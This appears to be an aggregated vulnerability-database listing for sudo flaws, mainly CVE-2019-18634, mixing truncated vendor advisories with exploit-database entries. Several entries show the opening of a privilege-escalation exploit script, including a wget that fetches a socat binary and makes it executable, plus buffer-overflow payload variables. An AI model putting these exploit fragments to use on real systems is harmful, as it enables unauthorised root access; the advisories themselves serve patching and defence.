Important: Red Hat Security Advisory: sudo security update
An update for sudo is now available for Red Hat Enterprise Linux 8.0 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is...
RHEL 8 : sudo (RHSA-2020:0487)
The remote Red Hat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:0487 advisory. The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged...
RHEL 8 : sudo (RHSA-2020:0509)
The remote Red Hat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:0509 advisory. The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged...
Exploit for Out-of-bounds Write in Sudo_Project Sudo
PoC exploit for CVE-2019-18634, a vulnerability in the Sudo pack...
MGASA-2020-0081 Updated sudo packages fix security vulnerability
The updated packages fix a security vulnerability: In Sudo before 1.8.31, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for...
Updated sudo packages fix security vulnerability
The updated packages fix a security vulnerability: In Sudo before 1.8.31, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for...
Exploit for Out-of-bounds Write in Sudo_Project Sudo
CVE-2019-18634. Warning: This code has only been tested on...
CVE-2020-7954
An issue was discovered in OpServices OpMon 9.3.2. Starting from the apache user account, it is possible to perform privilege escalation through the lack of correct configuration in the server's sudoers file, which by default allows the execution of programs (e.g. nmap) without the need for a...
Design/Logic Flaw
An issue was discovered in OpServices OpMon 9.3.2. Starting from the apache user account, it is possible to perform privilege escalation through the lack of correct configuration in the server's sudoers file, which by default allows the execution of programs (e.g. nmap) without the need for a...
[ASA-202002-2] sudo: privilege escalation
Arch Linux Security Advisory ASA-202002-2. Severity: High; Date: 2020-02-06; CVE-ID: CVE-2019-18634; Package: sudo; Type: privilege escalation; Remote: No; Link: https://security.archlinux.org/AVG-1093. Summary: The package sudo before version 1.8.31...
Sudo 1.8.25p - pwfeedback Buffer Overflow
Sudo 1.8.25p - pwfeedback Buffer Overflow !/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag =...
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow
!/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag = "\x04\x00\x00\x00" . "\x00"x24;...
USN-4263-2 sudo vulnerability
USN-4263-1 fixed a vulnerability in Sudo. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. Original advisory details: Joe Vennix discovered that Sudo incorrectly handled memory operations when the pwfeedback option is enabled. A local attacker could possibl...
USN-4263-2: Sudo vulnerability
USN-4263-1 fixed a vulnerability in Sudo. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. Original advisory details: Joe Vennix discovered that Sudo incorrectly handled memory operations when the pwfeedback option is enabled. A local attacker could possibl...
Sudo 1.8.25p - (pwfeedback) Buffer Overflow Exploit
!/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag = "\x04\x00\x00\x00" . "\x00"x24;...
RHEL 8 : sudo (RHSA-2020:0388)
The remote Red Hat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:0388 advisory. The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged...
sudo: Privilege escalation via 'Runas' specification with 'ALL' keyword
A flaw was found in the way sudo implemented running commands with arbitrary user ID. If a sudoers entry is written to allow the attacker to run a command as any user except root, this flaw can be used by the attacker to bypass that restriction...
Important: Red Hat Security Advisory: sudo security update
An update for sudo is now available for Red Hat Enterprise Linux 8.0 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is...
Ubuntu 16.04 LTS / 18.04 LTS : Sudo vulnerability (USN-4263-1)
The remote Ubuntu 16.04 LTS / 18.04 LTS host has packages installed that are affected by a vulnerability as referenced in the USN-4263-1 advisory. Joe Vennix discovered that Sudo incorrectly handled memory operations when the pwfeedback option is enabled. A local attacker could possibly use this...
Sudo 1.8.25p Buffer Overflow
Title: Sudo 1.8.25p - Buffer Overflow; Date: 2020-01-30; Author: Joe Vennix; Software: Sudo; Versions: Sudo versions prior to 1.8.26; CVE: CVE-2019-18634; Reference: https://www.sudo.ws/alerts/pwfeedback.html. Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting the...